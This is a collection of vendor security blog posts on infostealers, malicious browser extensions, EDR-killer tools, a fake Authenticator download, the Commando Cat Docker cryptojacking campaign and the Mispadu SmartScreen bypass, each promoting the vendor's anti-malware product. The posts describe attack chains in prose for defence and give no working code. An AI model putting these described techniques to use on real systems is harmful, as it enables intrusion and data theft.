The data tells a striking story: while media headlines scream about ransomware attacks, infostealers quietly dominate the threat landscape, accounting for nearly a quarter of all cybersecurity incidents. This silent majority operates without flashy ransom notes or system lockdowns, making them even more dangerous. As the defensive focus shifts to stopping ransomware, these stealthy data thieves slip through the cracks, reaping massive rewards with far less attention. The trend is clear – attackers have realized that stealing your data offers better ROI than holding it hostage.

What Even Is an Infostealer?

Infostealers are exactly what they sound like – malware designed to quietly extract sensitive information from your device. They target passwords, credit card details, cryptocurrency wallets, browser cookies, and pretty much anything that could be valuable on the digital black market. Think of them as the cybercriminal’s Swiss Army knife – versatile, reliable, and exceedingly popular.

Unlike ransomware’s dramatic hostage-taking approach, infostealers prefer to work in the shadows. They slip in, grab what they want, and often leave without you noticing anything’s wrong. By the time you realize your accounts have been compromised, your data is already being sold on dark web marketplaces or used for follow-up attacks.

Why Infostealers Are Booming in 2025

According to IBM’s X-Force Threat Intelligence Index 2025, credential harvesting now occurs in 29% of all cybersecurity incidents. That’s a massive slice of the cybercrime pie. The Verizon 2025 DBIR found that 54% of ransomware victims had their domains appear in infostealer logs first – meaning these stealers often serve as the appetizer before the main ransomware course.

Cryptocurrency remains a major driver behind infostealer popularity. With traditional banking fraud becoming harder to pull off, crypto wallets represent a softer target with potentially massive payoffs. Plus, the rise of BYOD (Bring Your Own Device) policies has created a perfect storm – personal devices often have both work and personal credentials, making them information goldmines.

The Fab Five: 2025’s Most Notorious Infostealers

Not all infostealers are created equal. Some have risen to the top through a combination of advanced features, reliability, and aggressive marketing on cybercrime forums. Here’s the current leaderboard of data thieves keeping security professionals up at night.

1. Lumma Stealer (LummaC2)

Lumma has climbed to the #1 spot in 2025, a remarkable rise for malware first detected in late 2022. Its success comes from its stealthy approach to data exfiltration – sending information in small fragments to avoid triggering security alerts. The developers offer tiered pricing plans ranging from $250 to $1,000, with premium features like network sniffing functionality reserved for big spenders.

What makes Lumma particularly dangerous is its comprehensive targeting. It captures browser data, cryptocurrency wallets, two-factor authentication apps, email clients, and even Telegram sessions. For cybercriminals willing to shell out $20,000, Lumma’s developers will even provide source code access and reselling rights – talk about customer service.

2. StealC Stealer

StealC has rocketed to second place this year, proving that sometimes the new kid on the block can outshine the veterans. Released in early 2023, StealC combines the best features of other top infostealers with an aggressive development cycle – releasing new features weekly. Unlike many competitors, StealC offers free testing periods and unusually responsive customer support on darknet forums.

Security researchers at Trac Labs noted StealC’s botched v2 release in 2024, but the developers quickly recovered with v2.1, which improved its ability to evade detection while expanding its targeting capabilities. Its growing market share makes it clear that stumbles haven’t impeded its rise to prominence.

3. RedLine Stealer

RedLine has held onto a top-three position since 2020, demonstrating impressive staying power in a fickle malware market. Written in C#, this veteran infostealer excels at grabbing credentials from over 60 browsers, VPN configs, cryptocurrency wallets, and FTP clients. Its relatively user-friendly control panel and reasonable pricing (starting around $150-$200) have maintained its popularity among less technical cybercriminals.

Despite being one of the older contenders, FortiGuard Labs reports that RedLine continues to receive regular updates. Recent versions have improved its ability to bypass Windows Defender and added capabilities to steal gaming accounts – because apparently, your Steam inventory is now worth stealing too.

4. Raccoon Stealer

If infostealers had an old guard, Raccoon would be part of it. Around since 2019, this digital veteran has somehow managed to stay relevant in the ever-changing malware landscape. While newer threats come and go, Raccoon keeps adapting and evolving – kind of like that one friend who somehow stays cool despite getting older.

What’s interesting about Raccoon isn’t just its staying power but how it’s run like an actual business. The developers offer round-the-clock customer support through Telegram (better service than my internet provider, honestly) and roll out updates more consistently than most legitimate software companies. They’ve recently added Telegram Desktop theft capabilities and expanded their crypto wallet targeting – because apparently stealing your Bitcoin wasn’t enough, now they want your obscure altcoins too.

At $275 monthly, it’s not exactly budget-friendly for aspiring cybercriminals, but you get what you pay for. Raccoon has earned its reputation for reliability in the underground markets. Hunt.io researchers recently caught it using fileless infection techniques – basically operating in your computer’s memory without leaving obvious traces on disk. It’s like a burglar who not only doesn’t break your windows but somehow manages to avoid leaving footprints on your carpet.

5. Vidar Stealer

Vidar is what happens when malware developers embrace the “build-your-own-adventure” model. Born as an offshoot of another stealer called Arkei back in 2018, Vidar gives its criminal users a modular, mix-and-match approach to data theft. Want to steal passwords but not cookies? No problem. Need crypto wallets but not browser history? They’ve got you covered.

What makes security pros lose sleep over Vidar is its chameleon-like ability to disappear after doing its dirty work. Once it’s grabbed what it came for, Vidar can completely remove itself from your system – like a thief who not only steals your valuables but also washes the dishes and vacuums before leaving, just to make you question if you’ve been robbed at all.

The U.S. Department of Health and Human Services didn’t mince words when they called Vidar “exceptionally potent.” It’s frequently deployed alongside ransomware like STOP/Djvu in tag-team attacks. The latest versions have even figured out how to steal MFA seed values – those supposedly “unbreakable” second factors protecting your accounts. It’s basically telling your two-factor authentication, “That’s cute, hold my beer.”

Data Targeted by Information Stealers

The visualization reveals a disturbing truth: modern infostealers don’t just target one type of data—they’re designed for comprehensive digital identity theft. Lumma leads the pack in browser data collection, which shouldn’t surprise anyone considering we practically live in our browsers. Meanwhile, the crypto wallet targeting reflects attackers’ preference for assets that are both valuable and irreversible once stolen. The pattern is clear: these tools are becoming increasingly sophisticated in their ability to extract everything from your digital life worth stealing.

Real-World Impact: When Infostealers Strike

The damage from infostealers extends far beyond individual victims. Major breaches in early 2025 demonstrate their growing threat to organizations of all sizes. Samsung Tickets suffered a massive leak in March when a hacker exploited credentials stolen by an infostealer infection from 2021, exposing 270,000 customer records.

Even more alarming, the HELLCAT ransomware group has made infostealers central to their strategy, successfully breaching Jaguar Land Rover, Telefónica, and several other major companies using stolen credentials from infostealer logs. These incidents highlight how a single compromised device can lead to enterprise-wide breaches months or even years later.

How to Keep Your Data From Being Stolen

Protecting yourself against infostealers doesn’t require a cybersecurity degree. Focus on these essentials:

• Update everything – Patch your system and apps promptly
• Use a password manager – Create unique passwords for every site
• Enable MFA everywhere possible – Preferably using authenticator apps
• Avoid pirated software – That “free” Photoshop is a trojan horse
• Run security software – Choose solutions that detect behavioral anomalies

For more detailed information, check out our comprehensive guide on how to detect, remove, and prevent infostealer infections.

The Bottom Line

Here’s the uncomfortable truth that cybersecurity professionals don’t always articulate clearly: in 2025, it’s not a question of if your credentials will be targeted, but when. Infostealers have evolved from crude data-grabbing tools into digital espionage platforms that operate with unsettling efficiency. They’re the silent assassins of the cybersecurity world – no flashy techniques, no dramatic demands, just quiet theft that often goes unnoticed until the damage is done.

The reality is that cybercriminals have realized a fundamental truth about human behavior: we’re creatures of habit and convenience, routinely sacrificing security for simplicity. Password reuse, postponed updates, and clicking without thinking aren’t just bad habits – they’re open invitations to these digital thieves. The brutal economics also can’t be ignored: why would criminals bother with complex ransomware operations when they can extract cryptocurrency wallet contents directly, without the messy negotiations?

The cybersecurity landscape is constantly evolving, but one principle remains stubbornly consistent – attackers will always follow the path of least resistance to valuable data. By implementing even some of the protection measures outlined above, you’re essentially making yourself a harder target. In the digital wilderness, you don’t need to outrun the bear – you just need to outrun the other hikers. Make your digital presence secure enough that attackers look for easier pickings elsewhere, and you’ve won half the battle.

Want to stay protected without a computer science degree? Gridinsoft Anti-Malware today and let us handle the technical heavy lifting while you get back to whatever you were doing before you started worrying about digital pickpockets.

The post Top 5 Infostealer Malware of 2025: The Silent Data Snatchers appeared first on Gridinsoft Blog.

Malicious browser extensions are not a novel threat; however, the year 2024 marks a notable resurgence in their use as effective tools in cybercrime arsenals. JsTimer, like the Funny Tool Redirect extension, is notorious for redirecting users during web browsing sessions and potentially harvesting extensive personal information, thereby posing a severe threat to user privacy.

Exploring the JsTimer Extension Virus

JsTimer is designed for Chrome and Chromium-based browsers and is categorized as a harmful plugin. On the surface, its actions might appear benign as it merely redirects users to Google Search’s main page anytime they attempt to access the Chrome Web Store. The mechanism behind this is straightforward yet invasive: JsTimer monitors and intercepts attempts to navigate to chromewebstore.google.com. This behavior mirrors the functionalities of traditional browser hijackers, making it a subtle yet significant threat.

Like many other malicious extensions, JsTimer exploits the “Managed by your organization” feature found in Chromium browsers. Typically, this setting is used by organizations to control browser setup and prevent users from modifying extensions and settings. However, in this scenario, cybercriminals manipulate this feature to thwart manual removal efforts by users.

Varied Effects of the JsTimer Malicious Plugin

The behavior of the JsTimer browser extension varies based on the IP address of the host computer. Under normal conditions, if the system’s IP address is from an area on the “operational” list, JsTimer engages in its primary malicious activities. Conversely, if the system is located in a “banned” region, the extension switches to a less aggressive mode.

Primarily, JsTimer’s main function is to redirect user searches from Google to alternative search engines. In its latest version, it redirects queries to findflarex.com, which then sends users to boyu.com.tr. Findflarex.com acts as an intermediary that not only captures the initial search request but also injects additional search tokens. Boyu.com.tr, a pseudo-search engine, uses these tokens to display an overwhelming number of advertisements. This redirection and ad-loading process are integral to the monetization strategy behind this malicious scheme.

Another facet of this scheme involves blocking access to the Chrome Web Store. Understandably, users frustrated by an extension that commandeers their search queries would naturally head to the Web Store to identify the offending extension, leave a critical review, and report the abuse. However, what this plugin cunningly does is redirect any attempts to visit chromewebstore.google.com back to the main Google search page. While this might seem minor initially, when combined with other malicious behaviors, it exacerbates the issues significantly.

If JsTimer detects that the system’s location is in what it deems the “wrong” region, it will restrict access to the Chrome Web Store. This tactic might go unnoticed by users who infrequently visit the store, yet it serves as a protective measure for the extension and any others that might be involved in the scheme.

Spreading Ways

Most of the time, junk extensions like JsTimer get into a browser through a fraudulent website that the user is getting redirected to. The latter often happens during interactions with questionable sites, typically ones with pirated content. On the page, the user sees an offer to install “the recommended extension” (text may vary depending on the case). Hackers’ hopes are on people clicking through the pages in a rush to get to the desired content. And that is it – after a single session on such a website, a user may end up with a handful of malicious extensions.

Another often situation that leads to the “install the extension” page is when there is an active adware in the system. Aside from injecting ads into all the pages that the user visits, it may also open additional tabs with more ads, or other questionable content. And since malware actors often stick to working with each other, it is not a big surprise to see adware opening a malicious extension installation page.

How to Remove JsTimer Extension?

It is possible to get rid of JsTimer in both manual and automated ways. I will recommend sticking to the automated due to the matters I’ve described above. Source malware, as well as other junk that could have gotten into the system in the same way will remain present even after you remove the extension. And for this purpose, I recommend you to use GridinSoft Anti-Malware.

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

Manual removal method

To get rid of the JsTimer extensions manually, you will need to get rid of the “Managed by your organization” thing. This trick stems from changes in the browser’s registry keys that are responsible for such deep configurations. Removing that registry key will do the job. Open Registry Editor by pressing Win+R and typing “regedit” into the appeared window. There, paste the registry address you see below:

Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Google\Chrome

You should delete this registry key: click it with the right mouse button and choose the corresponding option. That shall do the job – thereon, nothing will block you from removing the extension through the extension tab. After starting up, Chrome will recover its registry key, but without the malicious change.

You can also see the guides online that offer to change Group Policies. I will not share it here, as it is not possible to accomplish for all users of non-Pro Windows editions. And that is just another reason why removal with anti-malware software is preferable.

The post JsTimer Extension Virus – Easy Removal Instructions appeared first on Gridinsoft Blog.

Malicious browser extensions are far from being a new type of threat. Nonetheless, 2024 seems to be the year of their comeback as a widespread and rather potent cybercrime tool. During the unwanted redirect they are mainly known for, such extensions may also collect a lot of user information. This eventually makes the situation much more threatening for the user, primarily on the part of privacy.

What is a Funny Tool Redirect Extension Virus?

Funny Tool Redirect is a browser extension for Chrome and Chromium browsers that falls into a category of malicious plugins. Its visible behavior is not too threatening on the surface: all it does is redirect the user to the main page of Google Search should they try opening the Chrome Web Store. The way it works is pretty simple: it can track the URLs that the browser tries to open and simply intercepts every single call to the chromewebstore.google.com website. That functionality is identical to what browser hijackers can do.

Similar to all other extension viruses, Funny Tool abuses the “Managed by your organization” feature of Chromium browsers. As the name goes, this mode normally means that the company has set the browser up, and protects the extensions and other settings from user modifications. But in this case, con actors who design the extension take advantage of this feature to prevent manual removal attempts.

Effects of a Malicious Plugin

The Funny Tool Redirect browser extension appears to have distinct behavior depending on the IP address of the computer. It works in a rather simple manner: if the system is in the region from the “operational” list, it will go to its mainstream behavior. However, should the extension detect any of the “banned” country IPs, the behavior switches to a much less harmful mode.

So, the main activity of Funny Tool Redirect is redirecting the user from any Google search requests to a different search engine. In its current iteration, it routes everything to findflarex.com, which further throws the user to boyu.com.tr. The former is an intermediary website that, aside from intercepting the original request, also injects additional search tokens. The latter, in turn, is a wannabe search engine that uses the said search tokens to display huge amounts of ads. All this eventually forms the monetization form for that malicious scheme.

Another part of this scheme is blocking access to the Chrome Web Store. You see, people can get disgruntled with a thing that hijacks their search queries. The obvious reaction is to find the mischievous extension in the Web Store, leave a bitter comment, and report abuse to the administration. What the plugin does in this case is redirecting any requests to chromewebstore.google.com to the main Google page. This may look like not too much at first glance, but in combination with other malicious actions, it brings up a lot of problems.

When Funny Tool Redirect sees the “wrong” location of the system, it will only block the user out of the Chrome Web Store. Such tactics may remain unnoticed, if the user does not visit the store quite often, but may still be useful for other malicious extensions.

Spreading Ways

Most of the time, junk extensions like Funny Tool Redirect get into a user device through a fraudulent website that the user is getting redirected to. The latter often happens during interactions with questionable sites, typically ones with pirated content. On the page, the user sees an offer to install “the recommended extension” (text may vary depending on the case). Hackers’ hopes are on people clicking through the pages in a rush to get to the desired content. And that is it – after a single session on such a website, a user may end up with a handful of malicious extensions.

Another often situation that leads to the “install the extension” page is when there is an active adware in the system. Aside from injecting ads into all the pages that the user visits, it may also open additional tabs with more ads, or other questionable content. And since malware actors often stick to working with each other, it is not a big surprise to see adware opening a malicious extension installation page.

How to Remove Funny Tool Redirect Extension?

It is possible to get rid of Funny Tool Redirect in both manual and automated ways. I will recommend sticking to the automated due to the matters I’ve described above. Source malware, as well as other junk that could have gotten into the system in the same way will remain present even after you remove the extension. And for this purpose, I recommend you to use GridinSoft Anti-Malware.

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

Manual removal method

To get rid of the Funny Tool Redirect extensions manually, you will need to get rid of the “Managed by your organization” thing. This trick stems from changes in the browser’s registry keys that are responsible for such deep configurations. Removing that registry key will do the job. Open Registry Editor by pressing Win+R and typing “regedit” into the appeared window. There, paste the registry address you see below:

Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Google\Chrome

You should delete this registry key: click it with the right mouse button and choose the corresponding option. That shall do the job – thereon, nothing will block you from removing the extension through the extension tab. After starting up, Chrome will recover its registry key, but without the malicious change.

You can also see the guides online that offer to change Group Policies. I will not share it here, as it is not possible to accomplish for all users of non-Pro Windows editions. And that is just another reason why removal with anti-malware software is preferable.

The post Funny Tool Redirect Extension Virus – Easy Removal Instructions appeared first on Gridinsoft Blog.

EDRKillShifter Used in Ransomware Attacks

Research team from Sophos did a tremendous job analyzing the new toolkit. Being an element of targeted ransomware attacks, EDRKillShifter employs a lot of detection evasion techniques, as its usage is meant to be among the first attack steps. It is also worth noting that the tool is written in Golang, which appears to be a new trend among malware creators. And it adds for detection evasion, too, thanks to the availability of obfuscation utilities for this specific language.

One of the notable users of this anti-EDR tool is the RansomHub ransomware gang. Appeared in late February 2024, it quickly gained traction, attacking companies in Europe and the US. Nowadays, they are among the most active ransomware groups, claiming attacks on over 80 companies. Similar tools are also used by the LockBit ransomware group, namely the AuKill malware.

The execution of EDRKillShifter happens in three stages. First one requires direct interaction from adversaries: one should type the correct password when running the malware through the command line. Further steps happen automatically: malicious toolkit decrypts its resources and loads itself into the system memory. After that, the main course of the attack kicks in.

Key trick that this malicious toolkit pulls out is loading the vulnerable driver (BYOVD), which eventually does the main job of disabling EDRs. For this purpose, cybercriminals opt for a legitimate driver that has a known vulnerability. All the signatures and recognition of the latter allow the threat actors to do the trick under the nose of a still-working security solution. The driver allows the EDRKillShifter to methodically go through all the processes running in the environment, disabling ones that match with the hardcoded list.

How effective is EDRKillShifter?

Anti-EDR tools show a rather high efficiency in cyberattacks, and their growing popularity among threat actors confirms this. Disabling the security tool effectively unleashes adversaries in any further actions. EDRKillShifter is also rather hard to detect by itself, due to the obfuscation and BYOVD tactics it uses. Researchers also note that the list of EDR solutions that the toolkit may target is easy to expand. Since it is a hardcoded list, hackers simply add new or substitute older ones – is as easy as it sounds.

Fair enough, it is not the final payload, but it is what makes the deployment of one possible. Security analysts agree on the fact that such attack vectors will expand in future, with even more tricks and possibilities. Fortunately, BYOVD is not a new tactic and security vendors already have ways to detect the abuse.

Darknet Infrastructure of EDR Killer Tools

One more noteworthy thing about EDRKillShifter is the infrastructure built around this and similar toolkits. Obfuscation services and loaders for malware payloads were always a profitable Darknet business. And it applies to this anti-EDR solution, too: the loader that executes the first attack stage appears to be made by a different threat actor. Obfuscation is likely done by the third-party actor, too.

From a certain point of view, this may look like an unnecessary complication and extra costs of the attack. On the other hand, having a whole bunch of elements made by different cybercriminals makes it harder to detect and trace. And this is worth much more than a fee that the ransomware actors pay for all these operations.

The post EDRKillShifter Malware: New EDR Killer Tool in Ransomware Actors’ Toolkit appeared first on Gridinsoft Blog.

Fake Google Authenticator Downloading Page Promoted on Google Ads

On July 30, 2024 analysts noticed an advertisement on Google Search, that leads to a website mimicking the legit Google Authenticator downloading page. This is not the first ever abuse of a not ideal ad moderation in Google Ads, but this time frauds dare to fake Google itself. The exact scam advertisement uses fancy tricks that make the link in the ad look genuine. But upon clicking it, a chain of redirects is triggered, throwing the victim to chromeweb-authenticators.com website.

List of domains used in this scam

The website itself tries to copy the style of the original Authenticator page. It even contains links to genuine blog posts. What is different, however, is the presence of two tempting buttons that say “Download”. Thing is – Google never offered a desktop version of their MFA tool. And that is where the key part of the scheme happens.

Upon clicking any of two “Download” buttons, the site pulls the Authenticator.exe file from the GitHub repository. This way, hackers who stand behind the scheme prevent early detection: GitHub is considered safe, despite being used as a malware storage in a selection of attacks. But an unaware victim will confirm the download and run the fake Authenticator, launching the payload.

DeerStealer Inside of a Fake Google Authenticator

The payload is a sample of a rather new stealer malware, dubbed DeerStealer. It is rumored as a reworked variant of the XFiles infostealer, but that makes little to no difference for the user. Once the Authenticator.exe is running, it will launch the malicious payload via DLL hijacking. After that, DeerStealer effectively runs off-the-land, in the system memory, leaving no traces on the disk.

%SAMPLEPATH%\5d1e3b113e15fc5fd4a08f41e553b8fd0eaace74b6dc034e0f6237c5e10aa737.exe

Further, malware connects to one of several C2 addresses that it carries in the system memory, and sends the collected information. Aside from the stuff that is typical for infostealers – passwords, tokens, cryptowallets etc, it also collects a rather extensive system fingerprint: GUID, language, network configurations and computer name.

How to protect against malware scams?

The best protection against malware is to mitigate the problem proactively, so you won’t even get to the point when there is malware somewhere in your system. This, however, may be problematic: as you can see from the text above, threat actors have a lot of tricks to mess with people. That is why your attention, along with proper security software, is a key for avoiding malware infections.

Review sites you get the software from. Even if an ad from Google says the site is legit, it may be not, as you can see from this case. Always check the final URL, and, if not 100% sure, use trusted online URL scanner services. Free Website Scanner is a free service that will provide you with such capabilities.

Use reliable anti-malware software with proactive protection and network security. To avoid getting into next-level scams that are totally indistinguishable from legit sites, get yourself a protection that will detect such cases for you. GridinSoft Anti-Malware provides excellent protection against the most modern threats, and will cover you even during casual browsing.

The post Fake Google Authenticator Abuses Google Ads, Spreads Malware appeared first on Gridinsoft Blog.

Cyber Threats Facing the 2024 Paris Olympics

On July 26, the Olympic Games kicked off in Paris. However, as historical data shows, this is a significant challenge not only for athletes but also for the organizers. Specifically, the cybersecurity department needs to be particularly vigilant: 450 million attempted cyberattacks happened during the previous Olympic Games in Tokyo. These days, with all the advancement in technology, experts expect even more of them.

In 2024, 4 billion cyberattacks are expected, which is nearly eight times more than in the previous year. As the CEO of ANSSI (the organization responsible for managing the cybersecurity strategy for the Olympic Games) said, “We can’t prevent all the attacks, there will not be Games without attacks but we have to limit their impacts on the Olympics”.

2024 Olympics Cyber Threats: Who and Why?

There are a few factors to address before switching to actual threats: who may need to cause problems at a sporting event, and why. During these volatile times, a lot of countries have tensions between them. Though a few of them will certainly expand these disagreements to Olympic Games.

One of the key country that is interested in causing disruptions and chaos during Paris Olympics is Russia. This country, together with a handful of its tamed threat actors, has every reason to attempt to disrupt the Games. Sure enough, they mostly revolve around politics: at least grudges about participants supporting Ukraine in the war against them is enough. But be sure, they have even more pet peeves to pay off in such a sly way.

North Korea, a close ally of theirs, likely wants to take its bite, too. Their all-encompassing interest in gathering intelligence data ideally combines with such a massive event. And since NK threat actors are often forced into funding themselves with foreign currency, it will be a great feast for money-related phishing attacks.

Another country, well, even cluster of countries whose threat actors may take a look, is the Middle East. Although less numerous and more oriented towards regional conflicts and enemies, they fancy having such a source of data.

A more politically-agnostic threat comes from financially motivated actors. While this can overlap with the first two points, it is primarily unrelated to political or personal beliefs—it’s just a business. Malicious actors will attempt to attack every link in the chain and every area that can potentially be monetized, which I will elaborate on further.

Who is at Risk?

In reality, cybercriminals have boundless opportunities and a vast, untapped field in these year’s Olympic Games. This year, 84 companies have become official Olympic partners. Additionally, there are those connected through third-party services, such as hotel suppliers or those offering travel and leisure services.

Besides organizations and individuals directly and indirectly related to the event, critical infrastructure and other entities are at risk. These include telecommunications, energy, healthcare, and logistics in Paris. Individuals and fans must be particularly vigilant, as there is a high risk of scams, such as ticket fraud or fraudulent voting, which we will discuss further.

Key Cybersecurity Risks for the Paris 2024 Olympics

First, let me clarify that issues began a week before the event due to a global outage caused by an unsuccessful CrowdStrike update. Although not directly related to the event, this incident affected the preparations for the Games. But that is by far not the last problem during the event. With that being said, let’s dive into the threats that we will encounter in the nearest few weeks with a great probability.

Phishing

Phishing is rightly one of the most widespread and dangerous cyber threats, and it becomes particularly effective during major events. Scammers may send messages posing as official communications, such as notifications or announcements related to the Olympics. These messages are most often sent via email but can sometimes be sent as SMS messages.

Typically, these emails and SMS messages appear to come from the International Olympic Committee (IOC) or a related government agency. Red flags include links (often shortened using URL shorteners) or attached files (documents, archives, etc.). Clicking on these links or opening these files can eventually lead to fraud, malware attack and/or data theft. Nowadays, scammers might use various tricks, including sending messages purportedly from famous athletes or other officials. These messages might even request personal information, such as passwords or credit card details.

Malware Attacks

As an accompanying danger of phishing attacks there is a malware spreading risk. Frauds use email, SMS and other types of communications for different purposes, but only the former attracts them the most. The reason for this is its flexibility: one day you spread phishing links, and the other – malware-infused files. Just a single hasty click may separate you from getting the entirety of your online accounts compromised, bank accounts drained, and files encrypted.

Once again, the flexibility of email messages allow adversaries to exercise in social engineering. Celebrity endorsements, whaling, even a kind talk – all this fluently combines with malware delivery, making the attack tremendously effective.

Social Engineering

Amid the excitement surrounding the Olympic Games, scammers may try to manipulate people. For instance, con actors might pose as the IOC or a financial organization, asking people to support a particular athlete by sending a certain amount of money.

Of course, no sport is complete without betting. Scammers may impersonate betting companies, accepting bets on athletes at some unbelievably good coefficients. Naturally, no one will win anything except the scammers.

Another common scam involves charity collections. Scammers pose as a charitable organization (or an event partner/sponsor) and ask people to participate in a charitable donation. Considering how many wars and other disasters happen in the world, it may be problematic to distinguish the good from bad.

As I have mentioned multiple times, the political situation in the world heavily influences events, and the previous Games in Tokyo are an example. In 2018, Russian hackers launched a computer worm called “Olympic Destroyer.” It was used in an attack on the opening ceremony of the Winter Games in Pyeongchang, disrupting WiFi at the stadium, RFID systems, and the broadcast of the opening ceremony. Although Moscow denies involvement, the US Department of Justice in 2020 charged six hackers from Russian intelligence.

Fortunately, this year’s ceremony went smoothly, but that doesn’t mean threat actors won’t try to sabotage the event. There is a high likelihood that, in an attempt to disrupt the event, malicious actors will send provocative SMS messages, such as notifications of a terrorist threat. Although not a profitable endeavor, it can cause panic and interfere with the Olympic Games. This can also dull people’s vigilance or make them distrust official messages.

How to Stay Safe

The first recommendation is to exercise extreme caution when receiving any messages, especially those related to the Olympic Games. Carefully verify the sources of information and do not open suspicious attachments or links, even if they seem convincing. If you come across a fundraiser or advertisement related to the Olympics, do your own research. Investigate it thoroughly before participating, entering your information, or sending money.

Don’t fall for fakes. Scammers may launch advertising campaigns, such as offering to download an app or follow a link to watch a live broadcast in high quality. These sites are often placeholders that request you to send an SMS to receive an up-to-date link or ask you to download an app. In any case, after sending the SMS/payment, you will not receive a link to the broadcast, and in the worst case, you will download malicious software.

Use anti-malware solutions. In the era of AI and deepfakes, it is becoming increasingly difficult to distinguish fake from real. Malicious actors can convincingly promote phishing links through ads or the aforementioned methods. Using an anti-malware solution, such as GridinSoft Anti-Malware, will prevent malware from downloading and deploying on your device. Moreover, an Internet Security module can block suspicious or dangerous sites before they attempt to download a malicious file.

The post 2024 Olympic Cyberattack Risks: What Should We Expect appeared first on Gridinsoft Blog.

Docker API Vulnerability Exploited

Investigators have discovered a new malware campaign aimed at Docker API endpoints. The malware is called Commando Cat, and its purpose is to take advantage of misconfigured Docker APIs, allowing it to run harmful commands on the affected containers. According to a report, Commando Cat has nine distinct attack modules that can carry out several tasks. These include downloading and executing additional payloads, scanning for open ports and vulnerable services, stealing credentials and sensitive data, mining cryptocurrencies, launching distributed denial-of-service (DDoS) attacks, and spreading to other containers and hosts.

The malware campaign was first detected in January 2024. This marks the second Docker-related campaign identified in 2024, following the previous discovery of the malicious deployment of the 9hits traffic exchange application. Then, specialists observed a spike in malicious activity from a single IP address from China. The researchers traced the source of the attack to a Docker container running on a cloud server infected by Commando Cat. The malware had accessed the Docker API through an exposed port and executed a series of commands to download and run its modules.

Commando Cat Attacks Docker

Commando Cat delivers its payloads to exposed Docker API instances via the Internet. The attacker instructs Docker to fetch a Docker image known as “cmd.cat” from the project “Commando”, which generates Docker images with the necessary commands for execution. This choice of image is likely an attempt to appear benign and avoid suspicion. After creating a container, the attacker uses the “chroot” command to escape from the container onto the host’s operating system. The initial command looks for services “sys-kernel-debugger,” “gsc,” “c3pool_miner,” and “dockercache,” which are all created by the attacker after the infection.

Experts also believe the attacker avoids competing with another campaign by checking for the “sys-kernel-debugger” service. After these checks are passed, the attacker reruns the container with a different command, infecting it by copying specific binaries onto the host. This process involves renaming binaries to evade detection, a common tactic in cryptojacking campaigns. The attacker also deploys various payloads with parameters like “tshd,” “gsc,” and “aws.”

The final payload is delivered as a base64 encoded script. It deploys an XMRig crypto-miner and “secures” the Docker install on the infected host. Next, it removes all containers with a special command, and then it removes all containers without a command containing chroot. It kills other mining services before setting up its miner. Further, malware uses a systemd service to achieve persistence for the XMRig stager. It hides the docker-cache and docker-proxy services using the hid script. Finally, Commando Cat blackholes the Docker registry to eliminate the risk of competition.

Safety Tips

Protecting against a sophisticated threat, like Commando Cat is, appears to be a challenging affair. Its advanced detection evasion methods make it hard to detect for classic security solutions. But there are still enough tricks to make this malware less of a threat.

• Use Firewall. You can configure your firewall for strict packet filtering. Only allow necessary network connections and block all others. You can also limit outbound connections from containers to prevent unauthorized access.
• Employ XDR. Extended Detection and Response systems can analyze network traffic and identify anomalies. Suspicious activity should trigger warnings or alerts about potential intrusions. So, you can utilize network activity monitoring tools to detect unusual traffic related to the Docker API.
• Training and Awareness. Training users on secure Docker usage and basic cybersecurity practices is essential to prevent most problems. Educated users can help prevent social engineering and mishandling of data.

The post Docker API Vulnerability Exploited in Cryptojacking Campaign appeared first on Gridinsoft Blog.

Mispadu Trojan Uses SmartScreen Bypass

The extensive research regarding Mispadu malware done by Unit 42, among other things, underscores the use of a critical vulnerability in Windows to circumnavigate SmartScreen protection. The flaw, known as CVE-2023-36025, was detected and fixed by Microsoft back in November 2023. However, as of early February 2024, there are already several cases of malware exploiting that vulnerability, meaning that users hesitate to install a patch. Earlier, we wrote about a Phemedrone Stealer spreading campaign that uses the same detection evasion approach.

Said flaw is rather easy to exploit, as all that is needed is just a specifically crafted URL file. As such files are considered trusted by Microsoft Defender, the system will not pop up a SmartScreen banner warning about running the potentially dangerous file. In the background, this URL file forces the connection to the command server and downloads the payload in the form of a binary file.

Cybercriminals who stand behind Mispadu commonly use email spam to deliver these crafted URL files. However, other spreading ways may be even more successful, like, for example, sharing the file via social media, as Phemedrone masters do.

What is Mispadu Malware?

Mispadu itself is a rather unique example of a banking trojan that emerged back in 2019. It is distinctive by a peculiar region check method, persistent code encryption, and excessive obfuscation. For instance, to detect whether it runs in a prohibited region or not, it does not use a “traditional” IP address ban list. Instead, Mispadu checks the offset of the current system time from the UTC; it ceases further execution shall the value exceed the set limit.

This financial infostealer targets a range of financial websites, searching for the matches in the browsing history. Once Mispadu finds one present in its target list, it searches for the password in the browser’s AutoFill file and sends it to the command server. As a result, hackers get the full set of credentials related to financial services.

Despite having a flexible solution for targeting different banking and crypto services in different countries, the stealer focuses mainly on ones from both Americas and Western European countries. It is not clear whether such a selection is related to the location of malware masters or other factors.

How to Protect Yourself?

Malware like Mispadu is severe, though can rarely be called unavoidable. It exploits a well-known flaw, that is fixed in the latest Windows updates. There hence, by just updating the system you already demolish the primary injection vector this malware employs.

Nonetheless, it is worth keeping in mind that the file itself makes its way to the target system within a spam email. The latter remains the main propagation method for malware, scams , and phishing attacks. Know how to distinguish between a phishing email and a genuine one – and you will have much fewer chances to get into trouble at all.

Use a reliable anti-malware software as the additional protection layer. Everyone can make a mistake, and that’s completely normal – only those who do nothing will never make one. To get yourself backed up for such cases, I’d recommend using GridinSoft Anti-Malware – a reliable, lightweight, and easy-to-use anti-malware software. Its advanced detection mechanisms will be able to detect and stop any malware at its very beginning.

The post Mispadu Banking Trojan Exploits SmartScreen Flaw appeared first on Gridinsoft Blog.
